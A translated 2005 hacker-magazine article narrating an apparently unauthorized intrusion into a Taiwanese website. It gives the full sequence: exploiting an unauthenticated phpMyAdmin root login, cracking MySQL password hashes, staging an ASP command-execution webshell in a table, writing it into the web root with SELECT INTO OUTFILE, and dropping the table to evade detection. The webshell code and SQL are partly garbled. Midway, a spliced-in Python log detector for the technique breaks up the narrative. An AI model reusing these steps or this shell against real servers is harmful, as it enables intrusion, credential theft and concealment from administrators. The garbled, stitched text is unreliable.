Get the Webshell (MySQL Backup Webshell) with mysql



This article was published in "Hacker X Files" 2005 No. 1; when reposting, please credit the source: Hacker X Files.

Author: xack3r
Email: xack3r@xhacker.cn
http://www.xhacker.cn

This article is a write-up of a test I did out of boredom against a web site in Taiwan, recorded here as a summary. After getting the web address I pinged it and ran an X-Scan scan: the target host had only ports 21, 80, 3306 and 8080 open, and X-Scan reported no vulnerabilities. The operating system is Windows 2003, so it obviously runs IIS. Telnetting to the service ports to read the banners confirmed IIS, Serv-U FTP v5.2 and MySQL 4.0.21-NT. No vulnerabilities were known for these recent versions, so an overflow was unlikely.

Intrusion analysis: let's first look at the web application. It is PHP with MySQL, and an ASP forum is also installed. The site has no multi-user system; adding, deleting and other operations all go through an administrator back end, and the ASP forum provides file uploads. So for now the only approaches are injection and upload spoofing. First, www.target.com.tw/admin: the administrator login page had not been removed, but after I casually entered admin/admin I got "The page cannot be found"; the login handling had obviously been modified. Depressing. I tried guessing the management pages, but the structure made that extremely troublesome. However, the program has a quick-management navigation bar on the left side. Normally it can only be used once you are an administrator, and opening a link returns a warning, but that warning turned out to be very valuable to us: the administrator had not completely handled the PHP back-end files, so the call produced an error. The error was: Fatal error: Cannot instantiate non-existent class: html_template_it in d:/www/target/bussiness/admin/mmoney/money_news_list.php on line 20. So, without trying, we had obtained the web path; at least that saves some detours when writing files later. Next we tested the upload: capturing the request and disguising the file were blocked by the code's restrictions, and the upload failed. I thought it was over, but port 8080 on the target caught my attention. Entering www.target.com.tw:8080 gave "Welcome to phpMyAdmin 2.6.0-RC1". phpMyAdmin is a program for managing MySQL databases through the web, and what caught my eye were the notices "You must set $cfg['PmaAbsoluteUri'] in your configuration" and "MySQL 4.0.21-NT running on localhost, logged in as root@localhost". This is a mistake in phpMyAdmin's config.inc.php settings: we could access it directly and were never asked for a password.

We can see that $cfg['Servers'][$i]['auth_type'] = 'config'; is the default setting. When PHP is installed as an Apache module, http and cookie authentication can be used; when PHP is installed as CGI, cookie can be used; the default is config, which is a dangerous setting: with it we do not need to log in to phpMyAdmin at all, and we are logged in as the local root. Let's check the privileges, as shown in Figure 1. The administrator had created a user for the web program, but root had not been cleaned up or restricted and held ALL PRIVILEGES. So we can create a MySQL administrator; as expected there was no error, and the MySQL administrator account was created successfully. This article does not dwell on operating phpMyAdmin, so no more on that here. Oh, with an administrator account we can do a lot of things, but of course the goal is just one thing: privileges on the server. At that point the job was not finished; it was comparable to having added a system administrator.

Connect with the user we created. Remember that Eat wrote SuperMySQL (a MySQL database connection program): we don't need to install MySQL or any other database software locally, SuperMySQL is enough to execute commands and view database contents. Fill in the IP and log in with the username and password we just created. On success a prompt box appears; click confirm and you get the interface shown in Figure 2. Open the "mysql" database and you can see the database administrators' passwords, but that is not the end of it. Oh, to stay hidden we crack one of them; this is more convenient later and avoids being discovered by the administrator. "To do a good job, one must first sharpen one's tools": thanks to brother xuanniao's Crackmysql (cracking a 7-digit password takes only 10 minutes), it's fast, so whatever the hash, just let it run. The encrypted passwords of the accounts were identical; the administrator was that careless. I pasted in the encrypted password, and in under five minutes out came the password: 7851465. Oh, now we can delete the user we just created and log in with the administrator's account. Since the intrusion was long over when this article was written, I won't dwell on it; I will use SuperMySQL to connect as root. However, the connection failed. Unable to help myself, I finally went back to phpMyAdmin, and from Figure 1 you can see that root can only connect locally (host is localhost). The other user's host is "any host" (the % wildcard), which is also the most careless point.

I think you already know the next step: getting a webshell by "backing up" MySQL data. Remember that Superhei wrote AutoGetWebshell (in PHP: just enter the remote MySQL address, database name, username, password, the shell code and a writable web directory, and it exports a webshell directly). I tried it, filled in the related data and clicked submit, but it did not connect successfully and of course could not export. I thought it was a problem with my local setup, so I put it on my own web space, but the result was the same: the returned page was "Unable to find the web page". I don't know whether the author's code is incomplete; as I am still learning PHP I did not have the ability to check AutoGetWebshell's code, so it seemed it had to be done by hand. I had read the article on backing up a shell written by SWAN, in which MSSQL ran into character conversion when exporting files, so that the exported code could not be interpreted; MySQL may have the same problem. Following "Invading NT and Win2000 through MySQL", we insert the script into the database with SQL statements and then export it to the target host's web directory. For details see that original article; enter the command shown in Figure 3. If it succeeds it returns to the mysql/bin directory; if the table or cmd2.php already exists on the target host, the script fails. Viewed from the browser, we did get a shell, but only with Guest privileges: this shell script could not write anything, although the article said it was a System shell. Here it was nothing of the kind. Crash. It seemed we would have to try a different shell. Since the server has an ASP forum, pull out a simple ASP back door and construct a SQL file: use target; CREATE TABLE XACK3R (CMD text); this creates a table XACK3R with a single text field CMD. The following SQL statement inserts the ASP trojan.

insert into XaCk3r values ​​( '<% @ Language = VBScript%> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject ( "WSCRIPT.SHELL") Set oScriptNet = Server. CreateObject ("wscript.network") set ofilesys = server.createObject ("scripting.filesystemObject") szcmd = request.form (". Cmd") IF (Szcmd <> ") Then Sztempfile =" C: / "& OfileSys .GetTempname () Call Oscript.run ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if%>

" Method = "post">
 <% IF (isobject (ofile) Then ON Error Resume Next Response.Write Server.htmlencode (Ofile.Readall) Ofile.Close Call OfileSys.deletefile (Sztempfile, True) End IF%>   ');

select * from xack3r into outfile 'd://www/target//xack3r.asp'; this exports it to the web directory. Then go back to the mysql directory and enter the command: mysql -h ip -u usename -p

Does it still have to be entered on one line? Try it! Then connect with cat's SuperMySQL and enter the following commands. Let me explain here: "A Difficult but Real Invasion" was written a year ago, and reading it again now, some places differ. For example, when inserting the code into the table, the original uses INSERT INTO TMP VALUES (\"<% DIM OSCRIPT \"), with a backslash (\) before the quotes, and I don't know whether the copy on the network was altered unintentionally; I have not read the original. In this article you can see that INSERT INTO XACK3R VALUES ('code content') uses single quotes ('), so that it executes; otherwise it fails. Below we enter the following commands in SuperMySQL: use target; CREATE TABLE XACK3R (CMD text); The ASP back door has to be entered on a single line, but Yiyou's Super Dictionary Builder saves the hand work, and everyone should know how to use it. Carry on: INSERT INTO XACK3R VALUES ('<%@ language=vbscript%> … '); Fortunately the input popped up a "sent successfully" message box. The last step is to export the ASP file! In Figure 4 everyone can see the ASP back door written into the table and the success prompt. Visit http://www.target.com.tw/xack3r.asp. Dizzy! "The page you are looking for cannot be found; it may have been removed, had its name changed, or is temporarily unavailable." This had me completely puzzled: we clearly saw the code in the table, so why could it not be accessed? A really good question, and none of the experts had an answer. Impossible! An exported file cannot simply be swallowed by third-party software and not be there. Is it really that hard? We went back to the mysql command-line environment and tried writing two statements into a file saved as a SQL file: use target; select * from xack3r into outfile 'd://www/target//xack3r.asp'; then, back in the mysql environment, enter mysql -h xxx.xxx.xxx.xxx -u usename -p

The code is as follows: the write went smoothly, and the export also reported success. Access http://www.target.com.tw/xack3r.php, and surprise! It really was satisfying. As shown in Figure 5, from this back door we can now upload anything, and of course nothing is stronger than a PHP back door. In fact we didn't need to go to so much trouble: a lot can be constructed in SQL files. From "Invading NT and Win2000 through MySQL" you can see that in cmd2.php, every double quote (") in the MySQL file has a backslash (\) placed before it, and likewise there is a backslash (\) in front of the hyphen symbol (-), because in MySQL's syntax " and - in the imported statement would not come out as in the original, so a backslash is used as an escape; friends who have learned C will recognise this. After processing, enter MySQL in the CMD environment, execute mysql -h ip -u usname -p, then: '); select * from xack3r into outfile 'd://www//target//xack3r.php'; which exports it to the web directory. DROP TABLE XACK3R; deletes the table. We did not use this statement in the operations above, but in practice it is best to delete the table after exporting so as not to be discovered; one cannot be careless.
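From the defender's side, the sequence above leaves a distinctive trace in MySQL's general query log: a CREATE/INSERT that stages script markup in a table, followed by SELECT ... INTO OUTFILE pointing at the document root. This added example (not from the article) scans constructed log lines in the general-log format for exactly that; the web root d:/www/target is an assumption taken from the PHP error path shown earlier in the article.

```python
import re

# Assumption: document root recovered from the PHP fatal-error path in the article.
WEB_ROOTS = ["d:/www/target"]

# MySQL general query log line: "YYMMDD HH:MM:SS <conn-id> <Command> <argument>"
_LOG_LINE = re.compile(r"^\s*(?:\d{6}\s+\d{2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\s+(.*)$")
_OUTFILE = re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\s+'((?:[^'\\]|\\.)*)'", re.I)
_SCRIPT = re.compile(r"<\?php|<\?\s|<%", re.I)   # PHP / ASP open tags


def normalise(path):
    """Lower-case, forward slashes, collapse the doubled slashes seen in the article."""
    path = path.replace("\\", "/").lower()
    while "//" in path:
        path = path.replace("//", "/")
    return path


def under_web_root(path, roots=WEB_ROOTS):
    p = normalise(path)
    return any(p.startswith(normalise(r).rstrip("/") + "/") for r in roots)


def scan_general_log(lines, roots=WEB_ROOTS):
    """Return (connection-id, message) alerts for file exports into the web root and
    for INSERTs that stage server-side script markup in a table."""
    alerts = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m or m.group(2).lower() != "query":
            continue
        conn, sql = m.group(1), m.group(3)
        f = _OUTFILE.search(sql)
        if f and under_web_root(f.group(1), roots):
            alerts.append((conn, "file export into web root: " + f.group(1)))
        if re.match(r"\s*INSERT\b", sql, re.I) and _SCRIPT.search(sql):
            alerts.append((conn, "server-side script markup inserted into a table"))
    return alerts


# Constructed sample lines mirroring the article's steps plus a benign export.
SAMPLE_LOG = [
    "050112 21:03:11\t   17 Connect\troot@localhost on target",
    "050112 21:03:12\t   17 Query\tCREATE TABLE XACK3R (CMD text)",
    "050112 21:03:40\t   17 Query\tINSERT INTO XACK3R VALUES ('<%@ language=vbscript%> ...')",
    "050112 21:04:02\t   17 Query\tselect * from xack3r into outfile 'd://www/target//xack3r.asp'",
    "050112 21:10:00\t   18 Query\tSELECT * FROM orders INTO OUTFILE 'c:/backup/orders.txt'",
    "050112 21:11:00\t   18 Query\tDROP TABLE XACK3R",
]

if __name__ == "__main__":
    for conn, msg in scan_general_log(SAMPLE_LOG):
        print(f"connection {conn}: {msg}")
```

The benign export on connection 18 is not flagged because its path lies outside the web root.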

Continuing, http://www.target.com.tw/xack3r.php shows a code warning, as in Figure 6: Warning: Unexpected character in input: '\' (ASCII=92) state=1 in d:/www/target/index/xack3r.php on line ... Testing showed that this warning did not affect the functionality of my PHP upload back door; it uploads normally! Here the intrusion could be declared over; next, upload an ASP or PHP super-management back door. Once in, I found that the system partition was writable, and going to C:/Program Files we can see some of the software the administrator installed (Figure 7). Hoho, there are several pieces of software everyone is familiar with. I then uploaded our ASP back door. Was it luck? I think it is a big breakthrough toward host privileges: ServUDaemon.ini, which I believe everyone has used to break through many hosts. For that breakthrough, refer to "Using an ASP Trojan together with Serv-U to obtain administrator privileges". This article is almost over. Finally, although there was some coincidence in this case, it also took a lot of twists and turns. Having taken the host, we still tidied things up for it, starting with the web. The target host's defect at the outset was the inappropriate phpMyAdmin configuration, with several deadly points. Editing the config.inc.php file through the ASP back door, we found the places we had expected. A: $cfg['Servers'][$i]['auth_type'] = 'cookie'; here it should be changed to http or cookie; the original config.inc.php had config! This is the main one. B: $cfg['PmaAbsoluteUri'] = 'http://www.target.com.tw/phpmyadmin/'; the original was empty, which is also a dangerous setting. C: one thing I could not determine is whether the administrator manages the database remotely. If remotely, then how we handle root matters.

If we change root, remote connection through phpMyAdmin is no longer possible, so nothing is exposed. Supposing it was an oversight, the root user had not been properly handled, and there is no remote management, then $cfg['Servers'][$i]['user'] = 'root'; is where root should be removed; this way nobody can browse all databases directly from the web as root@localhost. Coming back to it, if the administrator logs in to phpMyAdmin to manage the MySQL data, he should notice this security problem, so the change we made is right.

For security, it is best to set up a dedicated user and privileges for phpMyAdmin. Here we set the user to target with password 7851465, which can only read tables in the target database: GRANT SELECT ON target.* TO target@localhost IDENTIFIED BY "7851465"; then edit phpMyAdmin's config.inc.php file: $cfg['Servers'][1]['controluser'] = 'target'; $cfg['Servers'][1]['controlpass'] = '7851465'; The intrusion process ends here. Summary: this article is a real intrusion process, written on the basis of some similar articles and making comprehensive use of some knowledge; there were problems that the aforementioned articles had not solved! I hope that most friends can understand it. This article only offers one idea, focused on solving the shortcomings of some articles on exporting a shell, and the results come from my repeated trials; I hope to exchange ideas with more people. However, if you scan widely for port 3306 and find a root with an empty password, there is not nearly so much confusion. Of course it is good to use tools written by others, but some tools still have many bugs and do not necessarily work so smoothly in our hands; more still relies on testing things yourself to make up for the shortcomings of some software authors, and that should be the spirit! Welcome to get in touch: xack3r, QQ: 83578988, E-mail: xack3r@xhacker.cn, http://www.xhacker.cn. Attachments related to this article can be found with Google!

When reposting, please credit the original URL: https://www.9cbs.com/read-39656.html
